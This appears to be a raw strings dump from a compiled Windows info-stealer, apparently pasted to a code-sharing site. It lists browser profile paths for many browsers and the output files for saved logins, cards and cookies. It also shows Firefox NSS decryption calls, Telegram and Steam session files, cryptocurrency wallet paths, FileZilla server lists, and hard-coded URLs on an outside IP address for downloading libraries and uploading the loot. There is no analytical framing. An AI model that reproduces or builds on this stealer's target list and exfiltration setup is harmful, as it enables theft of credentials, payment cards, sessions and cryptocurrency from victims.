%s\Yandex\YandexBrowser\User Data\Profile 1 %s\Yandex\YandexBrowser\User Data\Profile 2 %s\Yandex\YandexBrowser\User Data\Profile 3 Yandex_CC.txt a %s\Kometa\User Data\Default %s\Kometa\User Data\Profile 1 %s\Kometa\User Data\Profile 2 %s\Kometa\User Data\Profile 3 Kometa_CC.txt a %s\Orbitum\User Data\Default %s\Orbitum\User Data\Profile 1 %s\Orbitum\User Data\Profile 2 %s\Orbitum\User Data\Profile 3 Orbitum_CC.txt a %s\Comodo\Dragon\User Data\Default %s\Comodo\Dragon\User Data\Profile 1 %s\Comodo\Dragon\User Data\Profile 2 %s\Comodo\Dragon\User Data\Profile 3 Comodo_CC.txt a %s\Torch\User Data\Default %s\Torch\User Data\Profile 1 %s\Torch\User Data\Profile 2 %s\Torch\User Data\Profile 3 Torch_CC.txt a Opera_CC.txt %s\Opera Software\Opera Stable a %s\Xpom\User Data\Default %s\Xpom\User Data\Profile 1 %s\Xpom\User Data\Profile 2 %s\Xpom\User Data\Profile 3 MailRu_CC.txt a %s\Nichrome\User Data\Default %s\Nichrome\User Data\Profile 1 %s\Nichrome\User Data\Profile 2 %s\Nichrome\User Data\Profile 3 rambler_CC.txt a %s\Chromium\User Data\Default %s\Chromium\User Data\Profile 1 %s\Chromium\User Data\Profile 2 %s\Chromium\User Data\Profile 3 Chromium_CC.txt a Maxthon5_CC.txt %s\Maxthon5\Users\guest a Login Data Web Data %s\Sputnik\Sputnik\User Data\Default %s\Sputnik\Sputnik\User Data\Profile 1 %s\Sputnik\Sputnik\User Data\Profile 2 %s\Sputnik\Sputnik\User Data\Profile 3 Sputnik_CC.txt a %s\Epic Privacy Browser\User Data\Default %s\Epic Privacy Browser\User Data\Profile 1 %s\Epic Privacy Browser\User Data\Profile 2 %s\Epic Privacy Browser\User Data\Profile 3 Epic_CC.txt a %s\CocCocBrowser\User Data\Default %s\CocCocBrowser\User Data\Profile 1 %s\CocCocBrowser\User Data\Profile 2 %s\CocCocBrowser\User Data\Profile 3 CocCoc_CC.txt a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 1 a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 2 a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 3 a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 4 a Amigo_CC.txt %s\Amigo\User Data\Profile 4 a Amigo_CC.txt %s\Amigo\User Data\Profile 1 a Amigo_CC.txt %s\Amigo\User Data\Profile 2 a Amigo_CC.txt %s\Amigo\User Data\Profile 3 a SOFTWARE\Mozilla\Mozilla Firefox CurrentVersion SOFTWARE\Mozilla\Mozilla Firefox Main \ Install Directory Path Profile0 \ logins result.txt %s %s a URL: %s
  1828. Login: %s
  1829. Password: %s
  1830.  
  1831. hostname %s encryptedUsername encryptedPassword result.txt a URL: %s
  1832. Login: %s
  1833. Password: %s
  1834.  
  1835. %s\%s SELECT * FROM moz_logins; PATH ; PATH= nss3.dll NSS_Init NSS_Shutdown PL_ArenaFinish PR_Cleanup PK11_GetInternalKeySlot PK11_FreeSlot PK11SDR_Decrypt 32.zip http://141.105.71.82/Libs.zip wb result.txt C:\Program Files\Mozilla Firefox\firefox.exe a FireFox
  1836. %s\Mozilla\Firefox\profiles.ini %s\Mozilla\Firefox\%s C:\Program Files\Waterfox\waterfox.exe a Waterfox
  1837. %s\Waterfox\profiles.ini %s\Waterfox\%s C:\Program Files\Pale Moon\palemoon.exe a Pale Moon
  1838. %s\Moonchild Productions\Pale Moon\profiles.ini %s\Moonchild Productions\Pale Moon\%s C:\Program Files\Cyberfox\Cyberfox.exe a Cyberfox
  1839. %s\8pecxstudios\Cyberfox\profiles.ini %s\8pecxstudios\Cyberfox\%s C:\Program Files\NETGATE\Black Hawk\blackhawk.exe a BlackHawk
  1840. %s\NETGATE Technologies\BlackHawk\profiles.ini %s\NETGATE Technologies\BlackHawk\%s a K-Meleon
  1841. %s\K-Meleon\profiles.ini %s\K-Meleon\%s ERROR Don't copy string
  1842. C:\ Error Unable to Allocate Bitmap Memory wb Error Unable to Create Bitmap File D://prosto.bmp S o f t w a r e \ C l a s s e s \ t d e s k t o p . t g \ D e f a u l t I c o n SteamPath S o f t w a r e \ V a l v e \ S t e a m Telegram.exe tdata\D877F783D5D3EF8C1 tdata\D877F783D5D3EF8C0 tdata\D877F783D5D3EF8C\map1 tdata\D877F783D5D3EF8C\map0 Telegram\D877F783D5D3EF8C1 Telegram\D877F783D5D3EF8C0 Telegram\D877F783D5D3EF8C\map1 Telegram\D877F783D5D3EF8C\map0 %Y-%m-%d %H-%M-%S body.out https://api.ipify.org wb r .zip \Steam.exe \ssfn* \ \Config\*.* \Config\ browser\GOOGLE.txt GOOGLE.txt browser\Amigo.txt Amigo.txt browser\Vivaldi.txt Vivaldi.txt browser\YandexBrowser.txt YandexBrowser.txt browser\Kometa.txt Kometa.txt browser\Orbitum.txt Orbitum.txt browser\Comodo.txt Comodo.txt browser\Torch.txt Torch.txt browser\MailRu.txt MailRu.txt browser\rambler.txt rambler.txt browser\Chromium.txt Chromium.txt browser\Sputnik.txt Sputnik.txt browser\Epic.txt Epic.txt browser\CocCoc.txt CocCoc.txt browser\Opera.txt Opera.txt browser\Maxthon5.txt Maxthon5.txt browser\firefox.txt result.txt CC\GOOGLE_CC.txt GOOGLE_CC.txt CC\Amigo_CC.txt Amigo_CC.txt CC\Vivaldi_CC.txt Vivaldi_CC.txt CC\YandexBrowser_CC.txt Yandex_CC.txt CC\Kometa_CC.txt Kometa_CC.txt CC\Orbitum_CC.txt Orbitum_CC.txt CC\Comodo_CC.txt Comodo_CC.txt CC\Torch_CC.txt Torch_CC.txt CC\MailRu_CC.txt MailRu_CC.txt CC\rambler_CC.txt rambler_CC.txt CC\Chromium_CC.txt Chromium_CC.txt CC\Sputnik_CC.txt Sputnik_CC.txt CC\Epic_CC.txt Epic_CC.txt CC\CocCoc_CC.txt CocCoc_CC.txt CC\Opera_CC.txt Opera_CC.txt CC\Maxthon5_CC.txt Maxthon5_CC.txt Cookies\GOOGLE_Cookies.txt GOOGLE_Cookies.txt Cookies\Amigo_Cookies.txt Amigo_Cookies.txt Cookies\Vivaldi_Cookies.txt Vivaldi_Cookies.txt Cookies\YandexBrowser_Cookies.txt Yandex_Cookies.txt Cookies\Kometa_Cookies.txt Kometa_Cookies.txt Cookies\Orbitum_Cookies.txt Orbitum_Cookies.txt Cookies\Comodo_Cookies.txt Comodo_Cookies.txt Cookies\Torch_Cookies.txt Torch_Cookies.txt Cookies\MailRu_Cookies.txt MailRu_Cookies.txt Cookies\rambler_Cookies.txt rambler_Cookies.txt Cookies\Chromium_Cookies.txt Chromium_Cookies.txt Cookies\Sputnik_Cookies.txt Sputnik_Cookies.txt Cookies\Epic_Cookies.txt Epic_Cookies.txt Cookies\CocCoc_Cookies.txt CocCoc_Cookies.txt Cookies\Opera_Cookies.txt Opera_Cookies.txt Cookies\Maxthon5_Cookies.txt Maxthon5_Cookies.txt \ \*.txt \*.pfx No files
  1843. Steam\ No files in current directory!
  1844. Steam\Config\ \Armory\ \Armory\*.* \Dash\ \DashCore\*.dat \Bitcoin\wallets\ \Bitcoin\wallets\*.dat \Litecoin\wallets\ \Litecoin\wallets\*.dat \Monero\wallets\ \ *.keys \Doge\ \MultiDoge\*.wallet \Electrum\wallets\ \Electrum\wallets\*.dat \mSIGNA_Bitcoin\wallets\ \mSIGNA_Bitcoin\wallets\*.dat \Ethereum\keystore\ \Ethereum\keystore\* \FileZilla\recentservers.xml FileZilla\recentservers.xml No files in current directory!
  1845. ethereum\ No files in current directory!
  1846. mSIGNA\ No files in current directory!
  1847. Electrum\ No files in current directory!
  1848. Bitcoin\wallets\ No files in current directory!
  1849. Armory\ No files in current directory!
  1850. Dash\ No files in current directory!
  1851. Litecoin\ No files in current directory!
  1852. Doge\ No files in current directory!
  1853. Doge\ No files in current directory!
  1854. txt\ No files in current directory!
  1855. Sertificate\ file af3c4c9f-8ea3-413f-af4b-5700ee9157bc id http://141.105.71.82/Upload/ 32.zip result.txt mozglue.dll nss3.dll nssdbm3.dll softokn3.dll freebl3.dll result_cookies.txt result_CC.txt GOOGLE.txt Amigo.txt Vivaldi.txt Yandex.txt Kometa.txt Orbitum.txt Comodo.txt Torch.txt mailru.txt rambler.txt Chromium.txt Sputnik.txt Epic.txt CocCoc.txt Opera.txt Maxthon5.txt result.txt GOOGLE_CC.txt Amigo_CC.txt Vivaldi_CC.txt Yandex_CC.txt Kometa_CC.txt Orbitum_CC.txt Comodo_CC.txt Torch_CC.txt mailru_CC.txt rambler_CC.txt Chromium_CC.txt Sputnik_CC.txt Epic_CC.txt CocCoc_CC.txt Opera_CC.txt Maxthon5_CC.txt result_CC.txt GOOGLE_Cookies.txt Amigo_Cookies.txt Vivaldi_Cookies.txt Yandex_Cookies.txt Kometa_Cookies.txt Orbitum_Cookies.txt Comodo_Cookies.txt Torch_Cookies.txt mailru_Cookies.txt rambler_Cookies.txt Chromium_Cookies.txt Sputnik_Cookies.txt Epic_Cookies.txt CocCoc_Cookies.txt Opera_Cookies.txt Maxthon5_Cookies.txt result_Cookies.txt body.out r c : \ u s e r s \ i g o r 1 \ d e s k t o p \ b r o w s e r - d u m p w d - m a s t e r \ m i s c . c i d x < c o u n t c : \ u s e r s \ i g o r 1 \ d e s k t o p \ b r o w s e r - d u m p w d - m a s t e r \ m i s c . c i d x = = c o u n t - 1  |L €|L -0 xX r %4x %4x true false null [
  1856. ,
Add Comment
Please, Sign In to add comment